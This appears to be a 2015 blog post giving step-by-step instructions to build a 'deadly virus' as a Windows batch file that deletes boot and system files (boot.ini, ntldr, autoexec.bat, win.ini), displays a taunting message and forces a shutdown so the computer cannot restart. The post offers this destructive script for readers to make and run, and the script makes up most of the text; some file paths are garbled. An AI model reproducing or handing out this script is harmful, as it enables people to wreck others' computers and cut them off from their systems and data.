Showing posts with label WIndows trick. Show all posts
Showing posts with label WIndows trick. Show all posts

Tuesday, August 4, 2015

Deadly Virus!

Hello guys,

Today I'm going to tell you how to make a deadly virus that shutdown the system forever(need to format/repair).

Virus that crashes computer,  simply follow the trick.

Step 1 >> Open Notepad.
Step 2 >> Copy This Code .
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
Step 3 >> Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!
Keep Visiting :)